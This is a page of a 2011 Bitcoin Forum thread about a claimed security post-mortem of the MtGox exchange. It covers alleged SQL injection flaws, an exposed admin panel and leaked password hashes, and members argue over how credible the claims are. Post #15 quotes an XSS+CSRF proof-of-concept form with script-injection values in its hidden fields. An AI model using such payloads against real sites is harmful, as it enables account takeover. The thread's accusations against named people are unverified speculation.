Bitcoin Forum
December 08, 2016, 10:17:12 PM *
News: To be able to use the next phase of the beta forum software, please ensure that your email address is correct/functional.
 
   Home   Help Search Donate Login Register  
Pages: [1] 2 3 4 5 »  All
  Print  
Author Topic: [Full Disclosure] More likely MtGox Post-Mortem  (Read 21298 times)
jrmithdobbs
Jr. Member
*
Offline Offline

Activity: 59


View Profile
June 21, 2011, 04:35:20 AM
 #1

More full disclosure! More fun!

I have two independent sources claiming known SQLi vulnerabilities in MtGox.

One of said SQLi vulnerabilties was confirmed to be patched on the 16th.
The other was not patched, to anyone's knowledge, at the time of the market crash and database leak. The one that was not patched could have plausibly been used to dump the user table.

The details follow in these chat logs. POC for the referenced xss+csrf is also provided. Whether or not it is still an issue is not known for sure at this time as the site cannot be accessed.

It has also been found that MtGox exposes it's admin user interface even if a user does not have the admin flag set on their account. As of now it is thought that most actions attempted to be used will throw permission errors. Once again. This cannot be confirmed at this time. https://mtgox.com/app/webroot/code/admin

MagicalTux, now that your claim "The site was not compromised with a SQL injection as many are reporting, so in effect the site was not hacked." Please respond. The truth this time.

MagicalTux's official response at the time of this writing is also attached. It is available at:
https://support.mtgox.com/entries/20208066-huge-bitcoin-sell-off-due-to-a-compromised-account-rollback

These logs are not modified except for user's hostmasks at their request due to MagicalTux's new found policy of committing libel against his users based on login logs, since he apparently doesn't keep order book logs for orders that go through immediately, by his own admission. Classy.

Mirrors:
http://privatepaste.com/93e8a9cd64 (#bitcoin-hax log)
http://privatepaste.com/47a50cab5b (sig)
http://www.mediafire.com/?m7o4z3oz9nyd3v3 (#bitcoin-hax log)
http://www.mediafire.com/?nzcpa5mwpw9ccbb (sig)
http://privatepaste.com/e4bacfae37 (PovAddict log)
http://privatepaste.com/9dc5daf8a0 (sig)
http://www.mediafire.com/?bflr76anvv835ib (PovAddict log)
http://www.mediafire.com/?rl250c2dahw7dx9 (sig)
http://privatepaste.com/6dad3927d6 (XSS + CSRF)
http://privatepaste.com/45e5aa0d30 (sig)
http://www.mediafire.com/?synt5sjcbkl9zvq (XSS + CSRF)
http://www.mediafire.com/?uv7be34198pseoo (sig)

f-d: http://lists.grok.org.uk/pipermail/full-disclosure/2011-June/081582.html
Message is awaiting approval on bitcoin-list and bitcoin-development lists.

Edit: sourceforge list link (attachment-less reply)
http://sourceforge.net/mailarchive/forum.php?thread_name=D091767C-EF92-4B63-9C29-924F32AE34D7%40jrbobdobbs.org&forum_name=bitcoin-development

1B8TSDzXdyTRX5eF77gWQoXujBaDtKFE6H
1481235432
Hero Member
*
Offline Offline

Posts: 1481235432

View Profile Personal Message (Offline)

Ignore
1481235432
Reply with quote  #2

1481235432
Report to moderator
1481235432
Hero Member
*
Offline Offline

Posts: 1481235432

View Profile Personal Message (Offline)

Ignore
1481235432
Reply with quote  #2

1481235432
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1481235432
Hero Member
*
Offline Offline

Posts: 1481235432

View Profile Personal Message (Offline)

Ignore
1481235432
Reply with quote  #2

1481235432
Report to moderator
1481235432
Hero Member
*
Offline Offline

Posts: 1481235432

View Profile Personal Message (Offline)

Ignore
1481235432
Reply with quote  #2

1481235432
Report to moderator
gmaxwell
Staff
Legendary
*
Offline Offline

Activity: 2030



View Profile
June 21, 2011, 04:44:33 AM
 #2

Not mentioned here is that fact that dozens of MTGOX hashed passwords were quietly disclosed on a hash cracking forum on Fri Jun 17, 2011 5:21 am
(http://forum.insidepro.com/viewtopic.php?t=9124&postdays=0&postorder=asc&start=75&sid=1a9e31567fe815c0eea63c40c39fb707 post by "georgeclooney")

Since the overwhelming majority but not all of the hashes match the mtgox database that was posted on this forum (now deleted) and elsewhere I suspect that this post may have been generated from an earlier dump than was disclosed on the forums and everywhere else after the big event.

This appears to be significantly ahead of the prior claimed breach, and is consistent with the great many other mtgox users claiming that their accounts were robbed prior to the big event on Sunday, which I believe would have been too early to be results of the mtgox database leak according to the official timeline re: auditor compromise.
jrmithdobbs
Jr. Member
*
Offline Offline

Activity: 59


View Profile
June 21, 2011, 04:50:05 AM
 #3

Not mentioned here is that fact that dozens of MTGOX hashed passwords were quietly disclosed on a hash cracking forum on Fri Jun 17, 2011 5:21 am
(http://forum.insidepro.com/viewtopic.php?t=9124&postdays=0&postorder=asc&start=75&sid=1a9e31567fe815c0eea63c40c39fb707 post by "georgeclooney")

Since the overwhelming majority but not all of the hashes match the mtgox database that was posted on this forum (now deleted) and elsewhere I suspect that this post may have been generated from an earlier dump than was disclosed on the forums and everywhere else after the big event.

This appears to be significantly ahead of the prior claimed breach, and is consistent with the great many other mtgox users claiming that their accounts were robbed prior to the big event on Sunday, which I believe would have been too early to be results of the mtgox database leak according to the official timeline re: auditor compromise.


Whoops, forgot to add that. Added to f-d thread.

1B8TSDzXdyTRX5eF77gWQoXujBaDtKFE6H
chuckypalumbo
Jr. Member
*
Offline Offline

Activity: 56


View Profile WWW
June 21, 2011, 04:54:41 AM
 #4

Not mentioned here is that fact that dozens of MTGOX hashed passwords were quietly disclosed on a hash cracking forum on Fri Jun 17, 2011 5:21 am
(http://forum.insidepro.com/viewtopic.php?t=9124&postdays=0&postorder=asc&start=75&sid=1a9e31567fe815c0eea63c40c39fb707 post by "georgeclooney")

Since the overwhelming majority but not all of the hashes match the mtgox database that was posted on this forum (now deleted) and elsewhere I suspect that this post may have been generated from an earlier dump than was disclosed on the forums and everywhere else after the big event.

This appears to be significantly ahead of the prior claimed breach, and is consistent with the great many other mtgox users claiming that their accounts were robbed prior to the big event on Sunday, which I believe would have been too early to be results of the mtgox database leak according to the official timeline re: auditor compromise.


Jesus Christ.....

If you're looking to sign up for an exchange try Bitcoin7 or Tradehill, referral codes are listed below. Sign up for Tradehill and get 10% off of every trade you ever make.

https://www.bitcoin7.com/?ref=6383

http://www.tradehill.com/?r=TH-R15532
Phil21
Full Member
***
Offline Offline

Activity: 152


View Profile
June 21, 2011, 05:02:58 AM
 #5

People should read this.  All of it, even if it's boring to you.

This is what professional security teams do.  They do not blame their users for a hack that didn't happen in the first place (read: a user's account password being compromised likely was NOT the 500k selloff - at least by itself)

As I said in previous posts, the truth will come out one way or the other.  MT claiming his site is "safe" pretty much was the writing on the wall in that regard Smiley

I've made plenty of stupid ass security mistakes I'm completely embarrassed to admit to.  However, I've also admitted my mistakes and made conscious efforts to improve whenever I learn about something new.

joepie91
Sr. Member
****
Offline Offline

Activity: 294


View Profile
June 21, 2011, 05:06:25 AM
 #6

I told you so...

Like my post(s)? 12TSXLa5Tu6ag4PNYCwKKSiZsaSCpAjzpu Smiley
Quote from: hawks5999
I just can't wait for fall/winter. My furnace never generated money for me before. I'll keep mining until my furnace is more profitable.
Hook^
Jr. Member
*
Offline Offline

Activity: 56


View Profile
June 21, 2011, 05:16:47 AM
 #7

I told you so...
Speak up, I can't hear you.
nhodges
Sr. Member
****
Offline Offline

Activity: 308


View Profile
June 21, 2011, 05:20:59 AM
 #8

I think this is just the icing on the cake, but now there is no allegation of scandal at Mt. Gox, it is fact.

dana.powers
Newbie
*
Offline Offline

Activity: 21


View Profile
June 21, 2011, 05:23:49 AM
 #9

Thank you for posting.  The theory seems credible and is, at the least, a very interesting read.

Question: what was the purpose of https://mtgox.com/claim ?
Bit_Happy
Legendary
*
Offline Offline

Activity: 1442


A Great Time to Start Something!


View Profile
June 21, 2011, 05:24:28 AM
 #10

I think this is just the icing on the cake, but now there is no allegation of scandal at Mt. Gox, it is fact.

Fact?
What are his two independent sources, and why can they be trusted?
Exactly how do the posted links prove anything, in plain, simple English so everyone can understand, please?

15DYJpWJe9H1YofsNQbP9JEWWNn7XPZgbS
Bit_Happy
Legendary
*
Offline Offline

Activity: 1442


A Great Time to Start Something!


View Profile
June 21, 2011, 05:25:59 AM
 #11

Thank you for posting.  The theory seems credible and is, at the least, a very interesting read.

Question: what was the purpose of https://mtgox.com/claim ?

Claim = Re-claim Your account.
Verify your email and change your password.

15DYJpWJe9H1YofsNQbP9JEWWNn7XPZgbS
niemivh
Full Member
***
Offline Offline

Activity: 196



View Profile
June 21, 2011, 05:26:28 AM
 #12

Praise god I only have a little of my BTC on MtGox.

I guess this teaches us not all use 1 centralized site that used to sell Magic the Gathering cards.

We need about a dozen exchanges each with robust security and FDIC insurance.

 Cheesy

I'll keep my politics out of your economics if you keep your economics out of my politics.

16LdMA6pCgq9ULrstHmiwwwbGe1BJQyDqr
brunner
Newbie
*
Offline Offline

Activity: 14


View Profile
June 21, 2011, 05:29:57 AM
 #13

I agree that everyone should read this.

So, assuming the one 'user' with 500k BTC was MagicalTux, or someone close to him:

1) Gox launches with swiss cheese for security
2) Gox ignores all warning about being vulnerable, and continues to tell users they're safe
3) Gox gets hacked
4) Magical Tux's BTC gets sold for pennies
5) Magical Tux wants to roll back the transactions to get his bitcoin back

Am I missing something?
Hook^
Jr. Member
*
Offline Offline

Activity: 56


View Profile
June 21, 2011, 05:33:03 AM
 #14

I agree that everyone should read this.

So, assuming the one 'user' with 500k BTC was MagicalTux, or someone close to him:

1) Gox launches with swiss cheese for security
2) Gox ignores all warning about being vulnerable, and continues to tell users they're safe
3) Gox gets hacked
4) Magical Tux's BTC gets sold for pennies
5) Magical Tux wants to roll back the transactions to get his bitcoin back

Am I missing something?
Magical Tux probably doesn't have 500k BTC.  Perhaps everyone on the site combined would add up to 500k BTC.  I think every bitcoin on the site got liquidated.  So he is backing it out.  The problem is whether the coins got transferred out before he caught the transaction.
Bit_Happy
Legendary
*
Offline Offline

Activity: 1442


A Great Time to Start Something!


View Profile
June 21, 2011, 05:33:18 AM
 #15


IMO, Anyone starting a post like this needs to be able to demonstrate exactly where the attack part of this code is:

Code:
<body onload="/*document.forms['foo'].submit()*/"> <form id="foo" action="https://mtgox.com/merch/checkout" method="post" > <input type="hidden" name="notify_url" value="http://yourdomain.com/ipn.php&quot;})}alert(1);function blah(){test({5:&quot;"> <input type="hidden" name="business" value="foobar"> <input type="hidden" name="currency_code" value="USD"> <input type="hidden" name="item_name" value="Your Item Name<script>alert(1);</script>"> <input type="hidden" name="custom" value="your custom msg to yourself&quot;})}alert(1);function blah(){test({5:&quot;" > <input type="hidden" name="amount" value="10.30"> <input type="hidden" name="return" value="http://yourdomain.com/thanks"> <!--<input type="hidden" name="return" value="http://yourdomain.com/thanks&quot;;}alert(1);</script><script>">--> <input type="submit" value="Pay with Mt Gox" /> </form>


If you can show me (us) the "bad parts" and be correct, then thank you for posting this.
If you can't then (at best) you are acting without thinking things through.
Thank you

15DYJpWJe9H1YofsNQbP9JEWWNn7XPZgbS
Bind
Sr. Member
****
Offline Offline

Activity: 252

DO NOT ACCEPT PAYPAL FOR BTC YOU WILL GET BURNED


View Profile
June 21, 2011, 05:44:27 AM
 #16

... Or its all fabricated to make TradeHill look more secure in the eyes of the members of this forum.

The only reason I say that possibility is because, by their own admission, they checked out all the major bitcoin sites and exchanges for vulnerabilities, and said nothing god or bad about them. Yet, decided to zone in on TradeHill as being the best in terms of security, while neglecting to state why the other did not deserve equal mention.

Why?

If their security was so bad would it not deserve to be blasted like they did mtgox?

If they had good security would they not deserve to been mentioined like Tradehill ?

Plus the request to have TradeHill removed from the logs is quite possible a disinformation ruse to attempt to invalidate the possibility I just mentioned. (like omg,  why would i ask for tradehill to be removed if i was whoring for it?)

Regardless of the truth, it will never be able to be "proven" since, even if it is all true, the holes will be plugged by the time mtgox goes live.

Which is what we all want. A more secure market. (minus the drama please)

"... He is no fool who parts with that which he cannot keep, when he is sure to be recompensed with that which he cannot lose ..."

"... history disseminated to the masses is written by those who win battles and wars and murder their heroes ..."


1Dr3ig3EoBnPWq8JZrRTi8Hfp53Kj
Bit_Happy
Legendary
*
Offline Offline

Activity: 1442


A Great Time to Start Something!


View Profile
June 21, 2011, 05:46:23 AM
 #17

... Or its all fabricated to make TradeHill look more secure in the eyes of the members of this forum.
...

Hi Bind link,
Do you know Tradehill is on shared hosting?
LOL!

15DYJpWJe9H1YofsNQbP9JEWWNn7XPZgbS
jrmithdobbs
Jr. Member
*
Offline Offline

Activity: 59


View Profile
June 21, 2011, 05:47:51 AM
 #18

... Or its all fabricated to make TradeHill look more secure in the eyes of the members of this forum.

I do not endorse tradehill. If you read the entire log the person who made the tradehill comments asked that they be removed from the posted log. I refused. I am not a blatant hypocrite.

I do not have a tradehill account.

I do not endorse tradehill as an exchange.

I am not in any way affiliated with tradehill.

I think tradehill is bad for bitcoin because of their blatant disregard for us financial laws and dependence on third world outsourced devs working on closed source software that cannot be publically audited.

Now that that's out of the way, back to your regularly scheduled good times!

1B8TSDzXdyTRX5eF77gWQoXujBaDtKFE6H
Bit_Happy
Legendary
*
Offline Offline

Activity: 1442


A Great Time to Start Something!


View Profile
June 21, 2011, 05:51:34 AM
 #19

...
Now that that's out of the way, back to your regularly scheduled good times!

Please, answer the questions in post #10 and #15, or are you avoiding them?

15DYJpWJe9H1YofsNQbP9JEWWNn7XPZgbS
jrmithdobbs
Jr. Member
*
Offline Offline

Activity: 59


View Profile
June 21, 2011, 05:59:51 AM
 #20

...
Now that that's out of the way, back to your regularly scheduled good times!

Please, answer the questions in post #10 and #15, or are you avoiding them?

#15 will not be responded to. This is common practice to prevent people who do not understand the issue at hand from making use of the exploit.

#10 will not be responded to. If these sources wanted to be named they would have taken me up on my offer to gpg sign the logs. They are afraid of MagicalTux's blamecannon getting pointed their way.

1B8TSDzXdyTRX5eF77gWQoXujBaDtKFE6H
Pages: [1] 2 3 4 5 »  All
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!